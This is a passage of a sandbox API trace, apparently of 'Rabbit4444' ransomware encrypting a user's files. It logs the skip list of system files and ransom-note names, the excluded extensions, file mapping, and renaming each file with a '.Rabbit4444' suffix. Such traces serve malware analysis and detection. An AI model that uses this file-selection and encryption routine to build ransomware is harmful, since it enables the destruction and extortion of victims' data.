(HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1019e0 [0058.556] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x710, lpName=0x0) returned 0x298 [0058.557] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x710) returned 0x70000 [0058.558] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0058.558] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1096b8 [0058.558] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0058.558] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108df8 [0058.558] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0058.558] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108df8 | out: hHeap=0xe0000) returned 1 [0058.558] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0058.558] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1096b8 | out: hHeap=0xe0000) returned 1 [0058.558] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14986894440) returned 1 [0058.558] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1177e8 | out: hHeap=0xe0000) returned 1 [0058.558] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1019e0 | out: hHeap=0xe0000) returned 1 [0058.558] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0058.558] CloseHandle (hObject=0x298) returned 1 [0058.558] CloseHandle (hObject=0x278) returned 1 [0058.559] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{37E2F32E-C821-4094-B429-2B4E8EA810AA}.settingcontent-ms.Rabbit4444") returned 192 [0058.559] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{37E2F32E-C821-4094-B429-2B4E8EA810AA}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{37e2f32e-c821-4094-b429-2b4e8ea810aa}.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{37E2F32E-C821-4094-B429-2B4E8EA810AA}.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{37e2f32e-c821-4094-b429-2b4e8ea810aa}.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0058.559] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4c7f7146, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x4c7f7146, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x230eb5fd, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x482, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Classic_{38bd6d6e-bf78-4c31-b05a-7447ee37669f}.settingcontent-ms", cAlternateFileName="CL7C18~1.SET")) returned 1 [0058.559] lstrcmpiW (lpString1="Classic_{38bd6d6e-bf78-4c31-b05a-7447ee37669f}.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0058.559] lstrcmpiW (lpString1="Classic_{38bd6d6e-bf78-4c31-b05a-7447ee37669f}.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0058.559] lstrcmpiW (lpString1="Classic_{38bd6d6e-bf78-4c31-b05a-7447ee37669f}.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0058.559] lstrcmpiW (lpString1="Classic_{38bd6d6e-bf78-4c31-b05a-7447ee37669f}.settingcontent-ms", lpString2=".") returned 1 [0058.559] lstrcmpiW (lpString1="Classic_{38bd6d6e-bf78-4c31-b05a-7447ee37669f}.settingcontent-ms", lpString2="..") returned 1 [0058.559] lstrcmpiW (lpString1="Classic_{38bd6d6e-bf78-4c31-b05a-7447ee37669f}.settingcontent-ms", lpString2="windows") returned -1 [0058.559] lstrcmpiW (lpString1="Classic_{38bd6d6e-bf78-4c31-b05a-7447ee37669f}.settingcontent-ms", lpString2="bootmgr") returned 1 [0058.559] lstrcmpiW (lpString1="Classic_{38bd6d6e-bf78-4c31-b05a-7447ee37669f}.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0058.559] lstrcmpiW (lpString1="Classic_{38bd6d6e-bf78-4c31-b05a-7447ee37669f}.settingcontent-ms", lpString2="boot") returned 1 [0058.560] lstrcmpiW (lpString1="Classic_{38bd6d6e-bf78-4c31-b05a-7447ee37669f}.settingcontent-ms", lpString2="ids.txt") returned -1 [0058.560] lstrcmpiW (lpString1="Classic_{38bd6d6e-bf78-4c31-b05a-7447ee37669f}.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0058.560] lstrcpyW (in: lpString1=0x130ec22, lpString2="Classic_{38bd6d6e-bf78-4c31-b05a-7447ee37669f}.settingcontent-ms" | out: lpString1="Classic_{38bd6d6e-bf78-4c31-b05a-7447ee37669f}.settingcontent-ms") returned="Classic_{38bd6d6e-bf78-4c31-b05a-7447ee37669f}.settingcontent-ms" [0058.560] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{38bd6d6e-bf78-4c31-b05a-7447ee37669f}.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0058.560] lstrlenW (lpString="Classic_{38bd6d6e-bf78-4c31-b05a-7447ee37669f}.settingcontent-ms") returned 64 [0058.560] lstrlenW (lpString="Rabbit4444") returned 10 [0058.560] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0058.560] lstrlenW (lpString=".dll") returned 4 [0058.560] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0058.560] lstrlenW (lpString=".lnk") returned 4 [0058.560] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0058.560] lstrlenW (lpString=".ini") returned 4 [0058.560] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0058.560] lstrlenW (lpString=".sys") returned 4 [0058.560] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0058.560] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{38bd6d6e-bf78-4c31-b05a-7447ee37669f}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{38bd6d6e-bf78-4c31-b05a-7447ee37669f}.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0058.561] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0058.561] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14987135959) returned 1 [0058.561] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1154) returned 1 [0058.561] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117ab8 [0058.561] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101d98 [0058.561] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x790, lpName=0x0) returned 0x298 [0058.562] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x790) returned 0x70000 [0058.563] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0058.563] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109488 [0058.563] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0058.563] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1095a0 [0058.563] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0058.563] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1095a0 | out: hHeap=0xe0000) returned 1 [0058.563] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0058.563] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109488 | out: hHeap=0xe0000) returned 1 [0058.563] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14987391998) returned 1 [0058.563] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117ab8 | out: hHeap=0xe0000) returned 1 [0058.563] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101d98 | out: hHeap=0xe0000) returned 1 [0058.563] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0058.563] CloseHandle (hObject=0x298) returned 1 [0058.563] CloseHandle (hObject=0x278) returned 1 [0058.563] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{38bd6d6e-bf78-4c31-b05a-7447ee37669f}.settingcontent-ms.Rabbit4444") returned 192 [0058.564] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{38bd6d6e-bf78-4c31-b05a-7447ee37669f}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{38bd6d6e-bf78-4c31-b05a-7447ee37669f}.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{38bd6d6e-bf78-4c31-b05a-7447ee37669f}.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{38bd6d6e-bf78-4c31-b05a-7447ee37669f}.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0058.564] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4ca7f936, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x4ca7f936, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x224ffa05, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x418, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Classic_{3911D4F8-AD61-4911-A151-5682C26A7427}.settingcontent-ms", cAlternateFileName="CL7B4E~1.SET")) returned 1 [0058.564] lstrcmpiW (lpString1="Classic_{3911D4F8-AD61-4911-A151-5682C26A7427}.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0058.564] lstrcmpiW (lpString1="Classic_{3911D4F8-AD61-4911-A151-5682C26A7427}.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0058.564] lstrcmpiW (lpString1="Classic_{3911D4F8-AD61-4911-A151-5682C26A7427}.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0058.565] lstrcmpiW (lpString1="Classic_{3911D4F8-AD61-4911-A151-5682C26A7427}.settingcontent-ms", lpString2=".") returned 1 [0058.565] lstrcmpiW (lpString1="Classic_{3911D4F8-AD61-4911-A151-5682C26A7427}.settingcontent-ms", lpString2="..") returned 1 [0058.565] lstrcmpiW (lpString1="Classic_{3911D4F8-AD61-4911-A151-5682C26A7427}.settingcontent-ms", lpString2="windows") returned -1 [0058.565] lstrcmpiW (lpString1="Classic_{3911D4F8-AD61-4911-A151-5682C26A7427}.settingcontent-ms", lpString2="bootmgr") returned 1 [0058.565] lstrcmpiW (lpString1="Classic_{3911D4F8-AD61-4911-A151-5682C26A7427}.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0058.565] lstrcmpiW (lpString1="Classic_{3911D4F8-AD61-4911-A151-5682C26A7427}.settingcontent-ms", lpString2="boot") returned 1 [0058.565] lstrcmpiW (lpString1="Classic_{3911D4F8-AD61-4911-A151-5682C26A7427}.settingcontent-ms", lpString2="ids.txt") returned -1 [0058.565] lstrcmpiW (lpString1="Classic_{3911D4F8-AD61-4911-A151-5682C26A7427}.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0058.565] lstrcpyW (in: lpString1=0x130ec22, lpString2="Classic_{3911D4F8-AD61-4911-A151-5682C26A7427}.settingcontent-ms" | out: lpString1="Classic_{3911D4F8-AD61-4911-A151-5682C26A7427}.settingcontent-ms") returned="Classic_{3911D4F8-AD61-4911-A151-5682C26A7427}.settingcontent-ms" [0058.565] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{3911D4F8-AD61-4911-A151-5682C26A7427}.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0058.565] lstrlenW (lpString="Classic_{3911D4F8-AD61-4911-A151-5682C26A7427}.settingcontent-ms") returned 64 [0058.565] lstrlenW (lpString="Rabbit4444") returned 10 [0058.565] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0058.565] lstrlenW (lpString=".dll") returned 4 [0058.565] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0058.565] lstrlenW (lpString=".lnk") returned 4 [0058.565] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0058.565] lstrlenW (lpString=".ini") returned 4 [0058.565] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0058.565] lstrlenW (lpString=".sys") returned 4 [0058.565] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0058.565] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{3911D4F8-AD61-4911-A151-5682C26A7427}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{3911d4f8-ad61-4911-a151-5682c26a7427}.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0058.566] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0058.566] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14987651915) returned 1 [0058.566] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1048) returned 1 [0058.566] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117c98 [0058.566] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1020c8 [0058.566] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x720, lpName=0x0) returned 0x298 [0058.567] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x720) returned 0x70000 [0058.568] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0058.568] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108df8 [0058.568] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0058.568] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109258 [0058.568] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0058.568] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109258 | out: hHeap=0xe0000) returned 1 [0058.568] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0058.568] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108df8 | out: hHeap=0xe0000) returned 1 [0058.568] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14987903393) returned 1 [0058.568] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117c98 | out: hHeap=0xe0000) returned 1 [0058.568] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1020c8 | out: hHeap=0xe0000) returned 1 [0058.568] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0058.568] CloseHandle (hObject=0x298) returned 1 [0058.569] CloseHandle (hObject=0x278) returned 1 [0058.569] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{3911D4F8-AD61-4911-A151-5682C26A7427}.settingcontent-ms.Rabbit4444") returned 192 [0058.569] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{3911D4F8-AD61-4911-A151-5682C26A7427}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{3911d4f8-ad61-4911-a151-5682c26a7427}.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{3911D4F8-AD61-4911-A151-5682C26A7427}.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{3911d4f8-ad61-4911-a151-5682c26a7427}.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0058.569] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4cb1829f, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x4cb1829f, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x224ffa05, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3d2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Classic_{3A100872-EC27-46A5-BBCC-92C90635AE3B}.settingcontent-ms", cAlternateFileName="CL6DB0~1.SET")) returned 1 [0058.569] lstrcmpiW (lpString1="Classic_{3A100872-EC27-46A5-BBCC-92C90635AE3B}.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0058.570] lstrcmpiW (lpString1="Classic_{3A100872-EC27-46A5-BBCC-92C90635AE3B}.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0058.570] lstrcmpiW (lpString1="Classic_{3A100872-EC27-46A5-BBCC-92C90635AE3B}.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0058.570] lstrcmpiW (lpString1="Classic_{3A100872-EC27-46A5-BBCC-92C90635AE3B}.settingcontent-ms", lpString2=".") returned 1 [0058.570] lstrcmpiW (lpString1="Classic_{3A100872-EC27-46A5-BBCC-92C90635AE3B}.settingcontent-ms", lpString2="..") returned 1 [0058.570] lstrcmpiW (lpString1="Classic_{3A100872-EC27-46A5-BBCC-92C90635AE3B}.settingcontent-ms", lpString2="windows") returned -1 [0058.570] lstrcmpiW (lpString1="Classic_{3A100872-EC27-46A5-BBCC-92C90635AE3B}.settingcontent-ms", lpString2="bootmgr") returned 1 [0058.570] lstrcmpiW (lpString1="Classic_{3A100872-EC27-46A5-BBCC-92C90635AE3B}.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0058.570] lstrcmpiW (lpString1="Classic_{3A100872-EC27-46A5-BBCC-92C90635AE3B}.settingcontent-ms", lpString2="boot") returned 1 [0058.570] lstrcmpiW (lpString1="Classic_{3A100872-EC27-46A5-BBCC-92C90635AE3B}.settingcontent-ms", lpString2="ids.txt") returned -1 [0058.570] lstrcmpiW (lpString1="Classic_{3A100872-EC27-46A5-BBCC-92C90635AE3B}.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0058.570] lstrcpyW (in: lpString1=0x130ec22, lpString2="Classic_{3A100872-EC27-46A5-BBCC-92C90635AE3B}.settingcontent-ms" | out: lpString1="Classic_{3A100872-EC27-46A5-BBCC-92C90635AE3B}.settingcontent-ms") returned="Classic_{3A100872-EC27-46A5-BBCC-92C90635AE3B}.settingcontent-ms" [0058.570] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{3A100872-EC27-46A5-BBCC-92C90635AE3B}.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0058.570] lstrlenW (lpString="Classic_{3A100872-EC27-46A5-BBCC-92C90635AE3B}.settingcontent-ms") returned 64 [0058.570] lstrlenW (lpString="Rabbit4444") returned 10 [0058.570] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0058.570] lstrlenW (lpString=".dll") returned 4 [0058.570] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0058.570] lstrlenW (lpString=".lnk") returned 4 [0058.570] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0058.570] lstrlenW (lpString=".ini") returned 4 [0058.570] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0058.570] lstrlenW (lpString=".sys") returned 4 [0058.570] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0058.570] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{3A100872-EC27-46A5-BBCC-92C90635AE3B}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{3a100872-ec27-46a5-bbcc-92c90635ae3b}.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0058.571] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0058.571] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14988148470) returned 1 [0058.571] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=978) returned 1 [0058.571] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117860 [0058.571] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101848 [0058.571] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x6e0, lpName=0x0) returned 0x298 [0058.572] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x6e0) returned 0x70000 [0058.573] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0058.573] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109258 [0058.573] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0058.573] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1097d0 [0058.573] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0058.573] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1097d0 | out: hHeap=0xe0000) returned 1 [0058.573] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0058.573] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109258 | out: hHeap=0xe0000) returned 1 [0058.573] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14988421474) returned 1 [0058.574] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117860 | out: hHeap=0xe0000) returned 1 [0058.574] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101848 | out: hHeap=0xe0000) returned 1 [0058.574] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0058.574] CloseHandle (hObject=0x298) returned 1 [0058.574] CloseHandle (hObject=0x278) returned 1 [0058.574] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{3A100872-EC27-46A5-BBCC-92C90635AE3B}.settingcontent-ms.Rabbit4444") returned 192 [0058.574] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{3A100872-EC27-46A5-BBCC-92C90635AE3B}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{3a100872-ec27-46a5-bbcc-92c90635ae3b}.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{3A100872-EC27-46A5-BBCC-92C90635AE3B}.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{3a100872-ec27-46a5-bbcc-92c90635ae3b}.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0058.574] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4cc95a3a, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x4cc95a3a, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x23183f67, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4d9, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Classic_{3A4140C8-50D3-44E9-BF50-C878204DE0F5}.settingcontent-ms", 